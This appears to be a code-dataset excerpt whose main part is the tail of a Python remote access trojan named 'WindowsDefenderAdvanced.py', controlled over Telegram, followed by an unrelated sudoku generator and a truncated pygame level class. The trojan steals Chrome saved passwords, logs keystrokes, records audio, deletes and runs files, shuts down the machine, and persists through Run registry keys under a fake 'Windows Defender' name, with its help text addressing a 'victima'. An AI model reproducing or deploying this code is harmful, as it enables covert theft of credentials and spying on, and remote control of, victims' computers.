Data\\Default\\Login Data')\n cursor = con.cursor()\n cursor.execute(\n \"SELECT origin_url,username_value,password_value from logins;\")\n for users in cursor.fetchall():\n response += 'Website: ' + users[0] + '\\n'\n response += 'Username: ' + users[1] + '\\n'\n response += 'Password: ' + \\\n str(win32crypt.CryptUnprotectData(\n users[2], None, None, None, 0)) + '\\n\\n'\n elif command == '/get_wifi': \n pass\n elif command == '/get_key':\n try:\n bot.sendChatAction(chat_id, 'upload_document')\n bot.sendDocument(chat_id, open(keylogs_file, \"rb\"))\n except:\n response = 'No se pudo obtener el registro de Teclas.'\n pass\n elif command == '/get_desktop':\n try:\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Desktop\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n except:\n response = \"Hubo un error al acceder a la ruta\" \n \n elif command == '/get_documents':\n \"\"\"\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Documents\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n \n try:\n r= \"O:\\\\OneDrive - xKx\\\\SoftwareProyectGit\\\\RAT-via-Telegram\\\\tests\\\\\"\n # F:\\esto\\file1.txt\n #bot.sendChatAction(chat_id, 'typing')\n files = []\n files = os.listdir(r)\n human_readable = ''\n for file in files:\n human_readable += file + '\\n'\n #bot.sendDocument(chat_id, open(file, \"rb\"))\n #bot.sendDocument(chat_id, open( hide_folder + '\\\\' + path_file))\n try:\n bot.sendChatAction(chat_id, 'upload_document')\n bot.sendDocument(chat_id, open(\"\\\\\"+file))\n response += \"se envió\"+file\n except:\n response += \"no se envió el archivo: \"+file\n \n response += human_readable\n except:\n response = ' Hubo un error, vuelva a intentarlo denuevo'\n \"\"\"\n pass \n elif command == '/get_download':\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Downloads\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n elif command == '/get_videos':\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Videos\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n \n elif command == '/get_music':\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Music\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n \n elif command == '/get_pictures':\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Pictures\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n elif command == '/eliminar_key':\n command = command.replace('/eliminar_key', '')\n path_file = command.strip()\n try:\n os.remove(\"C:\\\\Users\\\\\"+str(getuser())+\"\\\\AppData\\\\Roaming\\\\Microsoft\\\\.keylogs\")\n response = 'El archivo \".keylogs\" se eliminó correctamente' \n except:\n response = 'No se pudo eliminar el archivo \".keylogs\" '\n elif command.startswith('/eliminar'): # Elimina carpeta o archivo\n command = command.replace('/eliminar', '')\n path_file = command.strip()\n try:\n os.remove(path_file)\n response = 'El archivo se eliminó correctamente'\n except:\n try:\n os.rmdir(path_file)\n response = 'La carpeta se eliminó correctamente'\n except:\n try:\n shutil.rmtree(path_file)\n response = 'Succesfully removed folder and it\\'s files'\n except:\n response = 'El archivo no existe'\n elif command.startswith('/audio'): # Graba Audio\n try:\n SECONDS = -1\n try:\n SECONDS = int(command.replace('/hear', '').strip())\n except:\n SECONDS = 5\n\n CHANNELS = 2\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n RATE = 44100\n\n audio = pyaudio.PyAudio()\n bot.sendChatAction(chat_id, 'typing')\n stream = audio.open(format=FORMAT, channels=CHANNELS,\n rate=RATE, input=True,\n frames_per_buffer=CHUNK)\n frames = []\n for i in range(0, int(RATE / CHUNK * SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n stream.stop_stream()\n stream.close()\n audio.terminate()\n\n wav_path = hide_folder + '\\\\mouthlogs.wav'\n waveFile = wave.open(wav_path, 'wb')\n waveFile.setnchannels(CHANNELS)\n waveFile.setsampwidth(audio.get_sample_size(FORMAT))\n waveFile.setframerate(RATE)\n waveFile.writeframes(b''.join(frames))\n waveFile.close()\n bot.sendChatAction(chat_id, 'upload_document')\n except OSError:\n cd.log(\n 'e', 'Unable to listen in - there is probably no input device.')\n response = 'unable to listen in - there is probably no input device'\n elif command == '/ip_info': # Información del IP\n try:\n bot.sendChatAction(chat_id, 'find_location')\n info = requests.get('http://ipinfo.io').text # json format\n location = (loads(info)['loc']).split(',')\n bot.sendLocation(chat_id, location[0], location[1])\n import string\n import re\n response = 'External IP: '\n response += \"\".join(\n filter(lambda char: char in string.printable, info))\n response = re.sub('[:,{}\\t\\\"]', '', response)\n response += '\\n' + 'Internal IP: ' + '\\n\\t' + internalIP()\n except:\n response = 'Hubo un error'\n elif command.startswith('/listar'): # Muestra lista de archivos y carpetas\n try:\n bot.sendChatAction(chat_id, 'typing')\n command = command.replace('/listar', '')\n command = command.strip()\n files = []\n if len(command) > 0:\n files = os.listdir(command)\n else:\n files = os.listdir(os.getcwd())\n human_readable = ''\n for file in files:\n human_readable += file + '\\n'\n response = human_readable\n except:\n response = ' Hubo un error, vuelva a intentarlo denuevo'\n elif command.startswith('/mensaje'): # Muestra un mensaje \n message = command.replace('/mensaje', '')\n if message == '':\n response = '/mensaje '\n else:\n ctypes.windll.user32.MessageBoxW(\n 0, message, u'Information', 0x40)\n response = 'MsgBox displayed'\n elif command.startswith('/mover'): # Mueve archivos \n command = command.replace('/mover', '')\n if len(command) > 0:\n try:\n file1 = command.split('\"')[1]\n file2 = command.split('\"')[3]\n move(file1, file2)\n response = 'El archivo se movió exitosamente.'\n except Exception as e:\n response = 'Error: \\n' + str(e)\n else:\n response = 'Usage: \\n/mv \"C:/Users/DonaldTrump/Desktop/porn.jpg\" \"C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]\"'\n response += '\\n\\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'\n elif command == '/pc_info': # Información de la Computadora\n bot.sendChatAction(chat_id, 'typing')\n info = ''\n for pc_info in platform.uname():\n info += '\\n' + pc_info\n info += '\\n' + 'Username: ' + getpass.getuser()\n response = info\n elif command == '/test': # Verifica conexión\n response = platform.uname()[1] + ': I\\'Se encuentra en linea!!'\n elif command.startswith('/web'): # Abre el navegador con una URL \n command = command.replace('/web', '')\n command = command.strip()\n if len(command) > 0:\n systemCommand = 'start \\\"\\\" \\\"'\n systemCommand += command\n systemCommand += '\\\"'\n if os.system(systemCommand) == 0:\n response = 'La pagina web se abrió con exito'\n else:\n response = 'Hubo un error al abrir la pagina web'\n else:\n response = '/web URL'\n elif command == '/proxy': # Abre puertos\n threading.Thread(target=proxy.main).start()\n info = requests.get('http://ipinfo.io').text # json format\n ip = (loads(info)['ip'])\n response = 'Proxy succesfully setup on ' + ip + ':8081'\n elif command == '/this': # Carpeta donde se encuentra RAT\n response = os.getcwd()\n elif command.startswith('/python_exec'):\n command = command.replace('/python_exec', '').strip()\n if len(command) == 0:\n response = 'Usage: /python_exec print(\\'printing\\')'\n else:\n cd.log('w', 'Executing python command')\n if response == '':\n response = 'Expression executed. No return or malformed expression.'\n elif command == '/reiniciar': # Reiniciará\n bot.sendChatAction(chat_id, 'typing')\n command = os.popen('shutdown /r /f /t 0')\n response = 'Computer will be restarted NOW.'\n elif command.startswith('/ejecutar'): # Ejecuta un archivo\n bot.sendChatAction(chat_id, 'typing')\n path_file = command.replace('/ejecutar', '')\n path_file = path_file[1:]\n if path_file == '':\n response = '/run_file C:/path/to/file'\n else:\n try:\n os.startfile(path_file)\n response = 'El archivo\\n\\n' + path_file + '\\n\\n Se ejecutó correctamente.'\n except:\n try:\n os.startfile(hide_folder + '\\\\' + path_file)\n response = 'El archivo:\\n ' + path_file + '\\n\\n Se ejecutó en hide_folder'\n except:\n response = 'No se encuentra el archivo'\n elif command.startswith('/calendario'): # Cambia la fecha del calendarios\n command = command.replace('/calendario', '')\n if command == '':\n response = '/calendario 2017 12 24 23 59 /msg_box happy christmas'\n else:\n scheduleDateTimeStr = command[1:command.index('/') - 1]\n scheduleDateTime = datetime.datetime.strptime(\n scheduleDateTimeStr, '%Y %m %d %H %M')\n scheduleMessage = command[command.index('/'):]\n schedule[scheduleDateTime] = {\n 'text': scheduleMessage, 'chat': {'id': chat_id}}\n response = 'Schedule set: ' + scheduleMessage\n runStackedSchedule(10)\n elif command == '/auto_destruye': # Auto destruye Rat\n bot.sendChatAction(chat_id, 'typing')\n global destroy\n destroy = True\n response = 'You sure? Type \\'/destroy\\' to proceed.'\n elif command == '/apagar': # Apaga la computadora\n bot.sendChatAction(chat_id, 'typing')\n command = os.popen('apagar /s /f /t 0')\n response = 'La computadora se apagará AHORA.'\n elif command == '/destruir' and destroy == True: # Destruye el RAT\n bot.sendChatAction(chat_id, 'typing')\n if os.path.exists(hide_folder):\n rmtree(hide_folder)\n if os.path.isfile(target_shortcut):\n os.remove(target_shortcut)\n os._exit(0)\n elif command == '/tareas': # Ver lista de tareas\n lines = os.popen('tasklist /FI \\\"STATUS ne NOT RESPONDING\\\"')\n response2 = ''\n for line in lines:\n line.replace('\\n\\n', '\\n')\n if len(line) > 2000:\n response2 += line\n else:\n response += line\n response += '\\n' + response2\n elif command.startswith('/enviar'): # Envia archivo de PC Maestro a PC victima\n command = command.replace('/enviar', '') \n import winsound\n winsound.Beep(440, 300)\n if command == '':\n response = '/enviar , /msg_box Hello HOME-PC and WORK-PC'\n else:\n targets = command[:command.index('/')]\n if platform.uname()[1] in targets:\n command = command.replace(targets, '')\n msg = {'text': command, 'chat': {'id': chat_id}}\n handle(msg) \n elif command == '/actualizar': # Actualiza F5 RAT\n proc_name = app_name + '.exe'\n if not os.path.exists(hide_folder + '\\\\updated.exe'):\n response = 'Send updated.exe first.'\n else:\n for proc in psutil.process_iter():\n # check whether the process name matches\n if proc.name() == proc_name:\n proc.kill()\n os.rename(hide_folder + '\\\\' + proc_name,\n hide_folder + '\\\\' + proc_name + '.bak')\n os.rename(hide_folder + '\\\\updated.exe',\n hide_folder + '\\\\' + proc_name)\n os.system(hide_folder + '\\\\' + proc_name)\n sys.exit()\n elif command.startswith('/fondo'): # Cambiar de fondo de pantalla\n command = command.replace('/fondo', '')\n command = command.strip()\n if len(command) == 0:\n response = 'Usage: /fondo C:/Users/User/Desktop/porn.jpg'\n elif command.startswith('http'):\n image = command.rsplit('/', 1)[1]\n image = hide_folder + '/' + image\n urllib.urlretrieve(command, image)\n ctypes.windll.user32.SystemParametersInfoW(\n 20, 0, image, 3)\n else:\n ctypes.windll.user32.SystemParametersInfoW(\n 20, 0, command.replace('/', '//'), 3)\n response = 'Se cambió el fondo de pantalla.' \n elif command == '/help':\n # functionalities dictionary: command:arguments\n functionalities = {'/red_info': ' => Información de la Red',\\\n '/webcam': ' => Toma foto a la WebCam',\\\n '/captura': ' => ',\\\n #'/cmd': ' => Ejecuta desde Consola ',\\\n '/ir': ' => Navega entre carpetas',\\\n '/eliminar': ' => Elimina archivo o carpeta',\\\n '/eliminar_key':' => Elimina el archivo Keylogger',\\\n '/cmd_dns': ' => Muestra información DNS',\\\n #'/cmd_ipconfig':' => Muestra información IP Config',\\\n '/descargar': ' => Descarga un archivo',\\\n '/copiar': ' => Copiar archivos, de la misma PC',\\\n '/mover': ' => Mueve archivos',\\\n #'/block_key': ' => Bloquea el Teclado',\\\n #'/block_mouse': ' => Bloquea el movimiento del Mouse',\\\n #'/desblock_mouse': ' => Desbloquear movimiento del mouse',\\\n '/get_chrome': ' => Obtener contraseñas de chrome',\\\n #'/get_wifi': ' => Obtener contraseñas de Wifi',\\\n '/get_key':' => Obtiene el registro de teclas',\\\n #'/get_documents':' => Obtiene Documentos del Usuario',\\\n #'/get_music':' => Obtiene Musica del Usuario',\\\n #'/get_videos':' => Obtiene Videos del Usuario',\\\n #'/get_pictures':' => Obtiene Photos del Usuario',\\\n #'/get_download':' => Obtiene Descargas del Usuario',\\\n #'/get_desktop':' => Obtiene Escritorio del Usuario',\\\n '/audio': ' => [tiempo en segundos, default=5s]',\\\n '/ip_info': ' => Obtener información de IP',\\\n '/test': ' => Verifica si la victima está en linea',\\\n '/web': ' => Abre en el navegador un LINK',\\\n '/proxy': ' => Abre un proxy',\\\n '/this': ' => Muestra directorio actual RAT',\\\n '/listar': ' => Muestra directorio actual RAT',\\\n '/reiniciar': ' => Reinicia la computadora',\\\n '/ejecutar': ' => Ejecuta un archivo *EXE',\\\n #'/calendario': ' => Modifica el calendario',\\\n #'/auto_destruye': ' => Se destruye RAT',\\\n '/apagar': ' => Apaga la computadora',\\\n #'/destruir': ' => Destruye el RAT',\\\n '/tareas': ' => Lista de Tareas',\\\n '/enviar': ' => Envia Archivos a la PC de la victima',\\\n #'/actualizar': ' => Actualiza la carpeta',\\\n '/fondo': ' => Cambia de fondo de pantalla'}\n response = \"\\n\".join(command + ' ' + description for command, description in sorted(functionalities.items()))\n else: # redirect to /help\n cd.log('w', 'BOT MISUSE: Invalid command')\n msg = {'text': '/help', 'chat': {'id': chat_id}}\n handle(msg)\n except Exception as e:\n cd.log('e', 'BOT MISUSE: Unknown error running command or function.')\n cd.log('z', 'Details from previous error'+str(e))\n cd.log('n', 'Command {} ran'.format(command))\n else: # Upload a file to target\n file_name = ''\n file_id = None\n if 'document' in msg:\n file_name = msg['document']['file_name']\n file_id = msg['document']['file_id']\n elif 'photo' in msg:\n file_time = int(time.time())\n file_id = msg['photo'][1]['file_id']\n file_name = file_id + '.jpg'\n file_path = bot.getFile(file_id=file_id)['file_path']\n link = 'https://api.telegram.org/file/bot' + \\\n str(token) + '/' + file_path\n file = (requests.get(link, stream=True)).raw\n with open(hide_folder + '\\\\' + file_name, 'wb') as out_file:\n copyfileobj(file, out_file)\n response = 'Archivo guardado como: ' + file_name\n if response != '':\n responses = split_string(4096, response)\n for resp in responses:\n send_safe_message(bot, chat_id, resp)\n\ndef KeyConMin(argument): # Caracteres Comunes // Optimizados\n switcher = {\n # Vocales Miniscula\n \"'a'\": \"a\",\n \"'e'\": \"e\",\n \"'i'\": \"i\",\n \"'o'\": \"o\",\n \"'u'\": \"u\",\n # Letras Minusculas\n \"'b'\": \"b\",\n \"'c'\": \"c\",\n \"'d'\": \"d\",\n \"'f'\": \"f\",\n \"'g'\": \"g\",\n \"'h'\": \"h\",\n \"'j'\": \"j\",\n \"'J'\": \"J\",\n \"'k'\": \"k\",\n \"'l'\": \"l\",\n \"'m'\": \"m\",\n \"'n'\": \"n\",\n \"'ñ'\": \"ñ\",\n \"'p'\": \"p\",\n \"'q'\": \"q\",\n \"'r'\": \"r\",\n \"'s'\": \"s\",\n \"'t'\": \"t\",\n \"'v'\": \"v\",\n \"'w'\": \"w\",\n \"'x'\": \"x\",\n \"'y'\": \"y\",\n \"'z'\": \"z\",\n # Caracteres\n \"','\": \",\", # ,\n \"'.'\": \".\", # .\n \"'_'\": \"_\", # _\n \"'-'\": \"-\", # -\n \"':'\": \":\", #\n # Vocales Mayúsculas\n \"'A'\": \"A\",\n \"'E'\": \"E\",\n \"'I'\": \"I\",\n \"'O'\": \"O\",\n \"'U'\": \"U\",\n # Letras Mayúsculas\n \"'B'\": \"B\",\n \"'C'\": \"C\",\n \"'D'\": \"D\",\n \"'F'\": \"F\",\n \"'G'\": \"G\",\n \"'H'\": \"H\",\n \"'K'\": \"K\",\n \"'L'\": \"L\",\n \"'M'\": \"M\",\n \"'N'\": \"N\",\n \"'Ñ'\": \"Ñ\",\n \"'P'\": \"P\",\n \"'Q'\": \"Q\",\n \"'R'\": \"R\",\n \"'S'\": \"S\",\n \"'T'\": \"T\",\n \"'V'\": \"V\",\n \"'W'\": \"W\",\n \"'X'\": \"X\",\n \"'Y'\": \"Y\",\n \"'Z'\": \"Z\",\n # Números Standard\n \"'1'\": \"1\",\n \"'2'\": \"2\",\n \"'3'\": \"3\",\n \"'4'\": \"4\",\n \"'5'\": \"5\",\n \"'6'\": \"6\",\n \"'7'\": \"7\",\n \"'8'\": \"8\",\n \"'9'\": \"9\",\n \"'0'\": \"0\",\n # Caracteres Especiales\n \"'@'\": \"@\", # @\n \"'#'\": \"#\", # #\n \"'*'\": \"*\", #\n \"'('\": \"(\", # (\n \"')'\": \")\", # )\n \"'?'\": \"?\", # ?\n \"'='\": \"=\", # =\n \"'+'\": \"+\", # +\n \"'!'\": \"!\", # !\n \"'}'\": \"}\", # }\n \"'{'\": \"{\", # {}\n \"'´'\": \"´\", # ´\n \"'|'\": \"|\", # |\n \"'°'\": \"°\", # °\n \"'^'\": \"¬\", # ^\n \"';'\": \";\", #\n \"'$'\": \"$\", # $\n \"'%'\": \"%\", # %\n \"'&'\": \"&\", # &\n \"'>'\": \">\", #\n \"'<'\": \"<\", # \n \"'/'\": \"/\", # /\n \"'¿'\": \"¿\", # ¿\n \"'¡'\": \"¡\", # ¡\n \"'~'\": \"~\" #\n }\n return switcher.get(argument, \"\")\ndef KeyConMax(argument): # Botones, comunes // Optimizados\n switcher = {\n \"Key.space\": \" \", # Espacio\n \"Key.backspace\": \"«\", # Borrar\n \"Key.enter\": \"\\r\\n\", # Salto de linea\n \"Key.tab\": \" \", # Tabulación\n \"Key.delete\":\" «×» \", # Suprimir\n # Números\n \"<96>\": \"0\", # 0\n \"<97>\": \"1\", # 1\n \"<98>\": \"2\", # 2\n \"<99>\": \"3\", # 3\n \"<100>\": \"4\", # 4\n \"<101>\": \"5\", # 5\n \"<102>\": \"6\", # 6\n \"<103>\": \"7\", # 7\n \"<104>\": \"8\", # 8\n \"<105>\": \"9\", # 9\n # Números Númeral\n \"None<96>\": \"0\", # 0\n \"None<97>\": \"1\", # 1\n \"None<98>\": \"2\", # 2\n \"None<99>\": \"3\", # 3\n \"None<100>\": \"4\", # 4\n \"None<101>\": \"5\", # 5\n \"None<102>\": \"6\", # 6\n \"None<103>\": \"7\", # 7\n \"None<104>\": \"8\", # 8\n \"None<105>\": \"9\", # 9\n # Teclas raras 2 \n \"['^']\": \"^\",\n \"['`']\": \"`\", #\n \"['¨']\": \"¨\", #\n \"['´']\": \"´\", #\n \"<110>\": \".\", #\n \"None<110>\": \".\", #\n \"Key.alt_l\": \" [Alt L] \", #\n \"Key.alt_r\": \" [Alt R] \",\n #\"Key.shift_r\": \" [Shift R] \",\n #\"Key.shift\": \" [Shift L] \",\n \"Key.ctrl_r\": \" [Ctrl R] \", #\n \"Key.ctrl_l\": \" [Ctrl L] \", #\n \"Key.right\" : \" [Right] \", #\n \"Key.left\" : \" [Left] \", #\n \"Key.up\" : \" [Up]\", #\n \"Key.down\" : \" [Down] \", #\n #\"'\\x16'\" : \" [Pegó] \",\n #\"'\\x18'\" : \" [Cortar] \", \n #\"'\\x03'\" : \" [Copiar] \", \n \"Key.caps_lock\" : \" [Mayus lock] \", \n #\"Key.media_previous\" : \" ♫ \", #\n #\"Key.media_next\" : \" ♫→ \", #\n #\"Key.media_play_pause\" : \" ■ ♫ ■ \",#\n \"Key.cmd\" : \" [Win] \" #\n }\n return switcher.get(argument, \"\")\ndef Klogger(): # Obtiene registro de teclas y guarda en un archivo .keylogs\n try: # Intenta crear el archivo\n log = os.environ.get(\n 'pylogger_file',\n os.path.expanduser('C:\\\\Users\\\\'+str(getuser())+'\\\\AppData\\\\Roaming\\\\Microsoft\\\\.keylogs')\n )\n T = datetime.datetime.now()\n getTime = \"Fecha: [\"+ T.strftime(\"%A\") + \" \" + T.strftime(\"%d\") + \" de \" + T.strftime(\"%B\") + \"]\\nHora: [\" + T.strftime(\"%I\")+ \":\"+ T.strftime(\"%M\")+ \" \"+ T.strftime(\"%p\")+ \" con \" + T.strftime(\"%S\") +\" Segundos]\\n\"\n with open (log, \"a\") as f:\n f.write(\"\\n--------------------------------------------\\nUserName: [\"+str(getuser()) +\"]\\n\"+ str(getTime)+\"--------------------------------------------\\n\\n\")\n except: # Si no puede crear el archivo, crea el directorio faltante\n pass\n def on_press(key):\n w = \"\"\n with open(log, \"a\") as f:\n if (len(str(key))) <= 3:\n print(KeyConMin(str(key)))\n \n f.write(KeyConMin(str(key)))\n else:\n print(KeyConMax(str(key)))\n f.write(KeyConMax(str(key)))\n with Listener(on_press=on_press) as listener: # Escucha pulsaciones de teclas\n listener.join() \n\n\n\n# HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n# HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n\n\n\ndef addStartup(): # function = Iniciar automaticamente\n path = r\"C:\\Users\\Public\\Security\\Windows Defender\\WindowsDefenderAdvanced.exe\" # Path del Software completo\n name = \"Windows Defender\" # Nombre del StartUp\n keyVal = r'Software\\Microsoft\\Windows\\CurrentVersion\\Run' # Path del registro\n def verificar():\n try: # Intenta crear la dirección\n os.makedirs('C:\\\\Users\\\\Public\\\\Security\\\\Microsoft')\n return True # Se creó la carpeta\n except:\n return False# La carpeta ya existe\n try: # Solo si tiene permisos de administrador\n registry = OpenKey(HKEY_LOCAL_MACHINE, keyVal, 0, KEY_ALL_ACCESS) # machine\n SetValueEx(registry,name, 0, REG_SZ, path)\n verificar() # Crea Carpeta\n except: # Si no tien permisos de administrador\n if (verificar()):\n registry = OpenKey(HKEY_CURRENT_USER, keyVal, 0, KEY_ALL_ACCESS) # local\n SetValueEx(registry,name, 0, REG_SZ, path)\n \n \n \n \ncd.log('s', 'Configuración Terminada')\ncd.log('i', 'Iniciando')\naddStartup() \nbot = telepot.Bot(token)\nbot.message_loop(handle)\nif len(known_ids) > 0:\n helloWorld = platform.uname()[1] + \": ==>> Está en linea...\"\n for known_id in known_ids:\n send_safe_message(bot, known_id, helloWorld)\n print(helloWorld)\ncd.log('s', 'Iniciando Hilo de Keylogger')\ncd.log('i', 'Keylogger iniciado')\n\np1 = threading.Thread(target=Klogger) # Keylogger \np1.start() # Inicia hilo keylogger\ncd.log('s', 'Todo se ejecutó con exito\\n')\ncd.log('i', 'Esperando comandos ==>> ' + platform.uname()[1] + '...\\n\\n')\npythoncom.PumpMessages() # Escucha los comandos\np1.join()\n","sub_path":"WindowsDefenderAdvanced.py","file_name":"WindowsDefenderAdvanced.py","file_ext":"py","file_size_in_byte":45113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"650720187","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nAuthor: Raphael Gonzalez\n\"\"\"\nfrom random import randint\nclass Blank_Sudoku():\n def __init__(self):\n self.sdk = []\n self.zeros = {}\n for i in range(9):\n row = []\n for j in range(9):\n possible_vals = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n self.zeros[(i, j)] = possible_vals[:]\n row.append(0)\n self.sdk.append(row)\n self.gen_puzzle()\n self.last_0s = self.get_last_0s()\n def __str__(self):\n sdk_str = \"\"\"\"\"\"\n for i in range(9):\n for j, val in enumerate(self.sdk[i]):\n if j % 3 == 0 and j != 0:\n sdk_str += \"| \" + str(val) + \" \"\n else:\n sdk_str += str(val) + \" \"\n sdk_str += \"\\n\"\n if i % 3 == 2 and i != 8:\n sdk_str += \"–\"*21 + \"\\n\"\n return sdk_str\n def get_cols(self):\n ''' this assumes a normal 9x9 sudoku'''\n collumns = []\n for i in range(9):\n col = []\n for j in range(9):\n col.append(self.sdk[j][i])\n collumns.append(col)\n return collumns\n def get_boxes(self):\n '''\n :returns the boxs of the sudoku left to right top to bottom\n '''\n boxes = []\n for i in range(9):\n if i == 0 or i % 3 == 0:# works for cunstructing boxes with normal list input, but doesn't with the np array\n box_set_1 = self.sdk[i][:3] + self.sdk[i+1][:3] + self.sdk[i+2][:3]\n boxes.append(box_set_1)\n box_set_2 = self.sdk[i][3:6] + self.sdk[i+1][3:6] + self.sdk[i+2][3:6]\n boxes.append(box_set_2)\n box_set_3 = self.sdk[i][6:] + self.sdk[i+1][6:] + self.sdk[i+2][6:]\n boxes.append(box_set_3)\n return boxes\n def get_box_id(self, r, c):\n if r < 3 and c < 3:\n return 0\n elif r < 3 and c >= 3 and c < 6:\n return 1\n elif r < 3 and c > 5:\n return 2\n elif r >= 3 and r < 6 and c < 3:\n return 3\n elif r >= 3 and r < 6 and c >= 3 and c < 6:\n return 4\n elif r >= 3 and r < 6 and c > 5:\n return 5\n elif r > 5 and c < 3:\n return 6\n elif r > 5 and c >= 3 and c < 6:\n return 7\n else:\n return 8\n def get_possibilities(self, r, c):\n row = self.sdk[r]\n col = self.get_cols()[c]\n box = self.get_boxes()[self.get_box_id(r, c)]\n info = row + col + box\n all_nums = (1, 2, 3, 4, 5, 6, 7, 8, 9)\n p = [] # all the possibilities for a given coordinate (r, c)\n for n in all_nums:\n if n not in info:\n p.append(n)\n return p\n def pick_num(self, row, col):\n possibilities = self.get_possibilities(row, col)\n if len(possibilities) < 1:\n raise Exception(f'there were no possibilities at ({row}, {col})')\n return possibilities[randint(0, len(possibilities)-1)]\n def gen_puzzle(self):\n for r_index in range(9):\n for c_index in range(9):\n try:\n self.sdk[r_index][c_index] = self.pick_num(r_index, c_index)\n except:\n # go back some where in the puzzle and make an edit\n pass\n def get_last_0s(self):\n zero_coords = []\n for r in range(9):\n for c in range(9):\n if self.sdk[r][c] == 0:\n zero_coords.append((r, c))\n return zero_coords\n\n\n########### old and bad pick_num func\n# box_fill_limit = randint(3, 6) # amount of numbers that can be predetermined in a box\n# col_fill_limit = randint(3, 6) # amount of numbers that can be predetermined in a column\n# row_fill_limit = randint(3, 6) # amount of numbers that can be predetermined in a box in a row\n# box = self.get_boxes()[self.get_box_id(row, col)]\n# column = self.get_cols()[col]\n# this_row = self.sdk[row]\n# def check_limit(arr):\n# fill_val = 0\n# for i in arr:\n# if i != 0:\n# fill_val +=1\n# return fill_val\n# if col_fill_limit <= check_limit(column):\n# pass\n# elif box_fill_limit <= check_limit(box):\n# pass\n# elif row_fill_limit <= check_limit(this_row):\n# pass\n# else:\n# try:\n# possibilities = self.zeros[(row, col)]\n# index = randint(0, len(possibilities) - 1)\n# self.sdk[row][col] = possibilities[index]\n# self.update_zeros()\n# except KeyError:\n# pass","sub_path":"Python/sudoku_gen.py","file_name":"sudoku_gen.py","file_ext":"py","file_size_in_byte":4815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"652939731","text":"import constants\nimport pygame\n\nfrom sprites.bullet import Bullet\nfrom components.button import Button\nfrom non_sprites.player import Player\n\n\nclass PlayLevel:\n\n def __init__(self, engine, level):\n self.engine = engine\n self.buttons = pygame.sprite.Group()\n\n self.buttons.add(Button(5, 5, './static/images/components/buttons/quit.png', self.quit))\n self.buttons.add(Button(constants.WIDTH - 85, 5, './static/images/components/buttons/menu.png', self.menu))\n\n self.menu_bar = pygame.Surface((constants.WIDTH, constants.MENU_BAR_HEIGHT))\n self.game_window = pygame.Surface((constants.WIDTH, constants.HEIGHT - constants.MENU_BAR_HEIGHT))\n\n self.level = level\n # TODO (big one) `\n self.player = Player(40, self.level.board_height() * 40 - 70)\n\n self.scroll_x = 0\n self.scroll_y = 0\n self.min_scroll_x = 0\n self.min_scroll_y = 0\n self.max_scroll_x = self.level.board_width() * 40 - self.game_window.get_width()\n self.max_scroll_y = self.level.board_height() * 40 - self.game_window.get_height()\n\n self.bullets = pygame.sprite.Group()\n\n self.click_list = []\n\n # This function takes a click location and determines where the user clicked relative to the map and the sprites.\n # If fullscreen or window resizing are ever implemented, this should be the only update function that needs to be changed.\n # It just uses scroll_x and scroll_y (and in the future: window_size) to determine the location of the click.\n def transform_click_coords(self, pos):\n result = (pos[0] + self.scroll_x, pos[1] - constants.MENU_BAR_HEIGHT +self.scroll_y)\n return result\n\n def click(self, pos):\n # TODO don't add a new bullet if the user cicks in the menu area\n self.bullets.add(Bullet((self.player.get_pixel_coords()[0] + 15, self.player.get_pixel_coords()[1] + 15), self.transform_click_coords(pos)))\n\n def quit(self):\n self.engine.quit()\n\n def menu(self):\n from perspectives.main_menu import MainMenu\n self.engine.switch_perspective(MainMenu(self.engine))\n\n def tick(self, screen):\n # Input\n for event in pygame.event.get():\n # TODO apparently mouse scrolling triggers this event\n if event.type == pygame.MOUSEBUTTONDOWN:\n for button in self.buttons:\n button.register_press(event.pos)\n self.click(event.pos)\n if event.type == pygame.MOUSEBUTTONUP:\n for button in self.buttons:\n button.register_release(event.pos)\n if event.type == pygame.MOUSEMOTION:\n for button in self.buttons:\n button.register_movement(event.pos)\n if event.type == pygame.QUIT:\n self.quit()\n\n key_state = pygame.key.get_pressed()\n if key_state[pygame.K_w]:\n self.player.move_y(-constants.MOVE_SPEED, self.level.board)\n if key_state[pygame.K_s]:\n self.player.move_y(constants.MOVE_SPEED, self.level.board)\n if key_state[pygame.K_d]:\n self.player.move_x(constants.MOVE_SPEED, self.level.board)\n if key_state[pygame.K_a]:\n self.player.move_x(-constants.MOVE_SPEED, self.level.board)\n\n # Update\n self.buttons.update()\n for bullet in self.bullets:\n bullet.update(self.level.board)\n\n # Draw\n self.menu_bar.fill(constants.COLORS.GREEN)\n self.buttons.draw(self.menu_bar)\n\n self.scroll_x = self.player.x - (self.game_window.get_width()/2 - 15)\n self.scroll_y = self.player.y - (self.game_window.get_height()/2 - 15)\n\n if self.scroll_x < self.min_scroll_x:\n self.scroll_x = self.min_scroll_x\n if self.scroll_x > self.max_scroll_x:\n self.scroll_x = self.max_scroll_x\n if self.scroll_y < self.min_scroll_y:\n self.scroll_y = self.min_scroll_y\n if self.scroll_y > self.max_scroll_y:\n self.scroll_y = self.max_scroll_y\n\n self.level.draw(self.game_window, self.scroll_x, self.scroll_y)\n self.player.draw(self.game_window, self.scroll_x, self.scroll_y, self.max_scroll_y)\n\n for bullet in self.bullets:\n if bullet.should_destroy(self.level.board):\n self.bullets.remove(bullet)\n bullet.draw(self.game_window, self.scroll_x, 